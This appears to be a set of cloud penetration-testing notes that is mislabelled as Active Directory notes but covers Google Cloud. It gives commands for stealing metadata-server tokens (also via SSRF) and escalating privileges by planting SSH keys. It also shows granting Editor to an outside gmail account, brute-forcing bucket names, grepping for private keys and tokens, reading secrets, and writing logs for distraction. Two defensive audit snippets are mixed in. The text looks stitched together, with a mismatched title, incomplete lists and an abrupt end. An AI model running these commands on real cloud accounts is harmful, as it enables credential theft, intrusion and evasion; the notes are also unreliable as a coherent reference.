Active Directory Pentesting Notes
Active Directory notes I made while going through TryHackMe material and doing some additional research.
The raw HTTP request behind a gcloud command can be found by appending --log-http to the command.

Recursively enumerate an instance's metadata:

```shell
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
```
Organization
--> Folders
--> Projects
--> Resources
Default service accounts look like the following:
PROJECT_NUMBER-compute@developer.gserviceaccount.com
PROJECT_ID@appspot.gserviceaccount.com
Custom service accounts look like the following:
SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
The metadata server can be queried at metadata.google.internal or at the 169.254.169.254 IP, such as in the example below:

```shell
$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \
  -H 'Metadata-Flavor:Google'
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/trace.append
```
The devstorage.read_only default scope allows read access to all storage buckets within the specified project. If cloud-platform is specified for an instance, the service account can attempt to authenticate to all API endpoints.

Role types:

- Primitive roles: Owner, Editor, and Viewer. The Editor role is insecure!!
- Predefined roles (e.g. compute.instanceAdmin)
- Custom roles
To see roles assigned to each member of a project:

```shell
gcloud projects get-iam-policy <PROJECT_ID>
```
| Command | Description |
| --- | --- |
| gcloud organizations list | Get organization ID |
| gcloud organizations get-iam-policy | View user permissions within organization |
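As an added example (not from the original notes), the least-privilege check from the defender's side: a small audit of the JSON form of gcloud projects get-iam-policy (or the organization-level equivalent) that flags the primitive roles listed above, principals outside the organisation's own domains, public principals, and the default compute service account holding a primitive role. The policy document and the trusted-domain allowlist are constructed assumptions.

```python
import json

# Primitive roles from the notes above; Editor in particular is called out as insecure.
PRIMITIVE_ROLES = {"roles/owner", "roles/editor", "roles/viewer"}
PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}

# Constructed sample shaped like `gcloud projects get-iam-policy <PROJECT_ID> --format=json`.
SAMPLE_POLICY = json.dumps({
    "bindings": [
        {"role": "roles/editor",
         "members": ["user:someone@gmail.com",
                     "serviceAccount:123456789-compute@developer.gserviceaccount.com"]},
        {"role": "roles/viewer", "members": ["group:auditors@example.com"]},
        {"role": "roles/compute.instanceAdmin.v1", "members": ["user:admin@example.com"]},
        {"role": "roles/owner", "members": ["user:admin@example.com"]},
    ],
    "etag": "BwXconstructed=", "version": 1,
})


def audit_policy(policy_json, trusted_domains=("example.com",)):
    """Return one finding per (member, role) pair that violates least privilege.

    trusted_domains is an assumed allowlist of identity domains the project owns.
    """
    findings = []
    suffixes = tuple("@" + d for d in trusted_domains)
    for binding in json.loads(policy_json).get("bindings", []):
        role = binding["role"]
        for member in binding.get("members", []):
            kind, _, ident = member.partition(":")
            issues = []
            if role in PRIMITIVE_ROLES:
                issues.append("primitive role")
            if member in PUBLIC_PRINCIPALS:
                issues.append("public principal")
            elif kind in ("user", "group") and not ident.endswith(suffixes):
                issues.append("principal outside trusted domains")
            if (kind == "serviceAccount" and role in PRIMITIVE_ROLES
                    and ident.endswith("-compute@developer.gserviceaccount.com")):
                issues.append("default compute SA with primitive role")
            if issues:
                findings.append({"member": member, "role": role, "issues": issues})
    return findings
```

Feed it `gcloud projects get-iam-policy <PROJECT_ID> --format=json` output instead of the sample to audit a real project.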
Token can be retrieved from the metadata service:

Request

```shell
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
```

Response

```json
{
  "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA",
  "expires_in":3599,
  "token_type":"Bearer"
}
```
The following are the steps taken to search for credentials when using the GCP client libraries:

- The GOOGLE_APPLICATION_CREDENTIALS environment variable is checked

⭐ Always make sure to check whether the principle of least privilege is being applied throughout the environment.
The privesc techniques described below are written from the perspective of internal access to a compromised instance. However, they can also be performed if you find SSRF in some cases.
If the client has the /v1beta endpoint enabled, you can get the access token without the special header:

```shell
curl http://metadata.google.internal/computeMetadata/v1beta/instance/service-accounts/default/token
```

Otherwise, you must query http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token with the custom Metadata-Flavor header set.
If gsutil ls returns no storage buckets, you may still be able to query a storage bucket by specifying its name, for example:

```shell
gsutil ls gs://storage_bucket_example-1234567
```
Enumerate scripts within the following areas:

Default Service Account

The following access scopes are offered for default service accounts:

Custom Service Account

One of the following privileges is necessary for privesc:

- compute.instances.setMetadata
- compute.projects.setCommonInstanceMetadata

It is also necessary to be able to authenticate to either https://www.googleapis.com/auth/compute or https://www.googleapis.com/auth/cloud-platform.
Adding SSH Key to Metadata

- sudo rights
- Block project-wide SSH keys option enabled

Adding SSH Key to Existing Privileged User
```shell
gcloud compute instances describe <INSTANCE> --zone <ZONE>
```

This returns something like the following:

```yaml
[...]
- key: ssh-keys
  value: |-
    high-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ high-priv-user
    low-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbk[...]
```

Generate a key pair for high-priv-user:

```shell
ssh-keygen -t rsa -C "high-priv-user" -f ./key -P ""
```

Add the high-priv-user public key file to the instance metadata:

```shell
gcloud compute instances add-metadata <INSTANCE> --metadata-from-file ssh-keys=ssh_public_file.txt
```
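From the detection side, as an added example that is not part of the original notes: the ssh-keys metadata value has the `user:key-type blob comment` shape shown above, so it can be parsed and compared against the key material recorded when the instance was provisioned; any user or key blob outside that baseline is a metadata change worth alerting on. The sample value (with truncated blobs) and the baseline dictionary are constructed.

```python
# Constructed sample in the shape of the `ssh-keys` metadata value shown above (blobs truncated).
SAMPLE_SSH_KEYS = """\
high-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1e high-priv-user
low-priv-user:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d low-priv-user

high-priv-user:ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedBlob unknown-laptop
"""

# Assumed baseline: {username: set of key blobs} captured when the instance was provisioned.
BASELINE = {
    "high-priv-user": {"AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1e"},
    "low-priv-user": {"AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d"},
}


def parse_ssh_keys(value):
    """Return (username, key_type, key_blob, comment) tuples from an ssh-keys metadata value.

    Each line is `username:key_type blob [comment]`; blank lines and lines that lack the
    colon or a key type plus blob are skipped rather than guessed at.
    """
    entries = []
    for line in value.splitlines():
        line = line.strip()
        if not line:
            continue
        user, sep, rest = line.partition(":")
        parts = rest.split(None, 2)
        if not sep or len(parts) < 2:
            continue
        comment = parts[2] if len(parts) == 3 else ""
        entries.append((user, parts[0], parts[1], comment))
    return entries


def unexpected_keys(value, baseline):
    """Entries whose user is absent from the baseline or whose blob is not recorded for that user."""
    return [e for e in parse_ssh_keys(value) if e[2] not in baseline.get(e[0], set())]
```

The same parser works on the project-level ssh-keys value, so project-wide key additions can be diffed the same way.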
Creating New User with SSH Key

- sudo permissions

Sudo to Existing Session

Use the following command to generate a new SSH key, add your current username to the google-sudoers group, and initiate an SSH session:

```shell
gcloud compute ssh <INSTANCE_NAME>
```
OS Login

Metadata values:

```
enable-oslogin = TRUE
enable-oslogin-2fa = TRUE
```

roles/compute.osLogin and roles/compute.osAdminLogin control SSH access to instances with OS Login enabled.

Block project-wide SSH keys option enabled:

```shell
gcloud compute project-info add-metadata --metadata-from-file ssh-keys=my_public_ssh-key.txt
```
Access scopes are not a security mechanism (stated by Google themselves).

Find Token Access Scopes

```shell
# Command substitution, not literal single quotes, so TOKEN holds the token itself
TOKEN=$(gcloud auth print-access-token)
curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN"
```

Activate a service account from an exported key file:

```shell
gcloud auth activate-service-account --key-file <FILE>
```
Check for Service Accounts with Exported Key Files

```shell
for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
  echo "Looking for keys for $i:"
  gcloud iam service-accounts keys list --iam-account "$i"
done
```

Exported key files are named like:

<PROJECT_ID>-<PORTION_OF_KEY_ID>.json

```shell
gcloud compute instances list --quiet
```

(PROJECT_NUMBER-compute@developer.gserviceaccount.com)

Local credential files to look for:

```
~/.config/gcloud/credentials.db
~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json
~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto
~/.credentials.json
```
Three ways to impersonate a service account:

1. With the iam.serviceAccountTokenCreator permission.
2. With Owner access, you can try logging into the web interface. Editor access can be granted to any arbitrary @gmail.com account, which can then log in (this can't provide Owner access):

```shell
gcloud projects add-iam-policy-binding <PROJECT> --member user:0xd4y@gmail.com --role roles/editor
```

3. With the --impersonate-service-account flag, to execute a command using the specified service account:

```shell
gcloud compute instances list --impersonate-service-account <SERVICE_ACCOUNT>
```
Some gcloud commands are made specifically for exporting data.

Finding databases across the project:

Cloud SQL
=============

```shell
gcloud sql instances list
gcloud sql databases list --instance [INSTANCE]
```

Cloud Spanner
==============

```shell
gcloud spanner instances list
gcloud spanner databases list --instance [INSTANCE]
```

Cloud Bigtable
==============

```shell
gcloud bigtable instances list
```
Use gsutil to interact with storage buckets. If gsutil ls returns access denied, access to storage buckets is still potentially possible, but requires the bucket name to be specified.

Bash Oneliner for Bruteforcing Bucket Names

```shell
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
| Command | Description |
| --- | --- |
| gcloud kms keyrings list --location global | Lists global keyrings available |
| gcloud kms keys list --keyring <KEYRING_NAME> --location global | Lists keys inside a keyring |
| gcloud kms decrypt --ciphertext-file=<INFILE> --plaintext-file=<OUTFILE> --key <KEY> --keyring <KEYRING> --location global | Decrypts file using a key |
Two ways to view the log files from the serial ports:

- Compute: Read Only access scope restriction

```shell
gcloud compute instances get-serial-port-output <INSTANCE_NAME> --port <PORT> --start start --zone <ZONE>
```
Find List of Custom Images

```shell
gcloud compute images list --no-standard-images
```

Export Images

```shell
gcloud compute images export --image <IMAGE_NAME> --export-format qcow2 --destination-uri <BUCKET>
```
| Command | Description |
| --- | --- |
| gcloud compute instance-templates list | Lists available templates |
| gcloud compute instance-templates describe <TEMPLATE_NAME> | Get details of specific template |
The write access scope allows writing to log files; however, if read permissions are also granted, then logs can be read.

| Command | Description |
| --- | --- |
| gcloud logging logs list | Lists log folders in current project |
| gcloud logging read <LOG_FOLDER> | Read contents of specific log folder |
| gcloud logging write <LOG_FOLDER> <MESSAGE> | Write arbitrary data to a specific log folder. Can be used for distraction. |
| Command | Description |
| --- | --- |
| gcloud functions list | Lists available cloud functions |
| gcloud functions describe <FUNCTION_NAME> | Display function configuration and defined environment variables |
| gcloud functions logs read <FUNCTION_NAME> | Get logs of the function executions |
| Command | Description |
| --- | --- |
| gcloud app versions list | Lists existing versions for all services in the App Engine server |
| gcloud app describe <APP> | Displays information about a specific app |
| Command | Description |
| --- | --- |
| gcloud run services list --platform=managed --format=json | Lists services across available platforms (managed) |
| gcloud run services list --platform=gke --format=json | Lists services across available platforms (GKE) |
| curl <URL> | Attempt to trigger a job as an unauthenticated user |
| curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" <URL> | Trigger a job as an authenticated user |
| Command | Description |
| --- | --- |
| gcloud ai-platform models list --format=json | Lists models |
| gcloud ai-platform jobs list --format=json | Lists jobs |
Pub/Sub is made up of the following:

| Command | Description |
| --- | --- |
| gcloud pubsub topics list | Lists topics in project |
| gcloud pubsub subscriptions list --format=json | Lists subscriptions for all topics |
| gcloud pubsub subscriptions pull <SUBSCRIPTION_NAME> | Pulls one or more messages from a subscription |
| Command | Description |
| --- | --- |
| gcloud source repos list | Enumerate available repos |
| gcloud source repos clone <REPO_NAME> | Clone a repo |
List Filestore Instances

```shell
gcloud filestore instances list --format=json
```
| Command | Description |
| --- | --- |
| gcloud container clusters list | List container clusters in current project |
| gcloud container clusters get-credentials <CLUSTER_NAME> --region <REGION> | Updates your ~/.kube/config file to include the cluster so that you can use kubectl |
| kubectl cluster-info | Get information about the cluster |

Kubectl cheat sheet: https://kubernetes.io/docs/reference/kubectl/cheatsheet/
| Command | Description |
| --- | --- |
| gcloud secrets list | Lists secrets in vault |
| gcloud secrets describe <SECRET> | Get the value of the secret |
```shell
TARGET_DIR="/path/to/whatever"

# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
  "$TARGET_DIR"

# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
  "$TARGET_DIR"

# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
  "$TARGET_DIR"

# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
  "$TARGET_DIR"

# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
  "$TARGET_DIR"

# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
  "$TARGET_DIR"

# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
  "$TARGET_DIR"
```
Default firewall rules:

- default-allow-internal - allows all traffic from other instances on the same network
- default-allow-ssh - allows port 22 traffic from everywhere
- default-allow-rdp - allows port 3389 traffic from everywhere
- default-allow-icmp - allows ping from everywhere

View all subnets in current project:

```shell
gcloud compute networks subnets list
```

View all internal/external IP addresses in project:

```shell
gcloud compute instances list
```

View open ports of all instances